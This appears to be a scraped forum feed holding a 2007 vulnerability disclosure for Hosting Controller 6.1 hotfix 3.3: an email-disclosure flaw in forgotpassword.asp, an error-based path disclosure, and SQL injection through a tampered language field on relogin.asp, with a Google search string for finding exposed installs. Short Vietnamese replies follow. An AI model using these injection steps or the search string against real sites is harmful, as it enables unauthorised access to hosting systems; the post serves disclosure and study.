<![CDATA[Latest posts for the topic "Hosting Controller 6.1, hotfix 3.3 - Bad Input validation"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Hosting Controller 6.1, hotfix 3.3 - Bad Input validation Software: Hosting Controller 6.1, latest hot fix 3.3 URL: http://www.hostingcontroller.com Google hack keywords: "Powered by hosting controller inurl:/admin" Severity: Medium Found by Z0rr0 (dont know if anyone else already found them) - July 15, 2007 1. Information leak at "forgotpassword.asp" page to disclose users email. URL: http://domain.com/admin/forgotpassword.asp Exploit: Enter an known user account, such as "hcadmin", this will show you exact email of user "hcadmin" Code:
Your Password Authentication ID has been e-mailed to you at email@emai.com
2. Bad input validation at "forgotpassword.asp" cause information leakage URL: http://domain.com/admin/forgotpassword.asp Exploit: Inject a single quote to Login ID field of "forgotpassword" page. It cause an '800a000d' error with path disclosed Code:
.......... <font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>
<p>
<font face="Arial" size=2>Type mismatch: 'GetErrDesc'</font>
<p>
<font face="Arial" size=2>/admin/common/SqlInject.asp</font><font face="Arial" size=2>, line 21</font>
3. Bad input validation at "relogin.asp" Language field, causes SQL injection: URL: http://domain.com/admin/common/relogin.asp Exploit: Relogin form as below: Code:
<form action="http://domain.com/admin/common/relogin.asp?action=1" method="GET" id="loginfrm" name="loginfrm">
............
<td class="contents" width="110" height="22" align="right">Username :   </td>
<td class="contents" width="227" height="22"><input id="AdName" name="AdName" size="20" class="txtbox"></td>
..............
<td class="contents" width="110" height="22" align="right">Password :   </td>
<td class="contents" width="227" height="22"><input type="password" id="pass1" name="pass1" size="20" class="txtbox"></td>
.................
<td class="contents" width="110" height="22" align="right">Language :   </td>
<td class="contents" height="22">
<select name="language" class="combo" ID="Select1"><option selected VALUE="1'">English</option>
<option VALUE="2">.....</option>
................
</form>
Change the Value="1" to Value="1'" (add a single quote). This cause a Blind SQL injection "500 Internal Server Error": Code:
Microsoft OLE DB Provider for ODBC Drivers
error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'languageID = 1''
Vendor not yet be informed. (Z0rr0)]]>
/hvaonline/posts/list/13267.html#78897 /hvaonline/posts/list/13267.html#78897 GMT
Re: Hosting Controller 6.1, hotfix 3.3 - Bad Input validation /hvaonline/posts/list/13267.html#95240 /hvaonline/posts/list/13267.html#95240 GMT Re: Hosting Controller 6.1, hotfix 3.3 - Bad Input validation /hvaonline/posts/list/13267.html#115675 /hvaonline/posts/list/13267.html#115675 GMT Re: Hosting Controller 6.1, hotfix 3.3 - Bad Input validation

doqkhanh wrote:
Cái em quan tâm là tìm xem nguồn các đại ka đã thành danh như Z0rr0 xem ở đâu, khi search "Exploit: Relogin form as below:" trên google thì ko thấy, --> trong 1 diễn đàn nào đó hoặc một nơi nào đó bắt đăng nhập mà ko cho bot search vào??? Đại ka có thể cho vài lời chỉ giáo không à? 
"Nguồn" gì bồ? Muốn tìm các lỗi như vậy cách tốt nhất là cài đặt thử phần mềm ở local mà tìm hiểu.]]>
/hvaonline/posts/list/13267.html#115688 /hvaonline/posts/list/13267.html#115688 GMT
Re: Hosting Controller 6.1, hotfix 3.3 - Bad Input validation

Z0rr0 wrote:
Muốn tìm các lỗi như vậy cách tốt nhất là cài đặt thử phần mềm ở local mà tìm hiểu. 
Đã hiểu cách làm của bác. Xin lỗi vì đã làm loãng chủ đề.]]>
/hvaonline/posts/list/13267.html#116072 /hvaonline/posts/list/13267.html#116072 GMT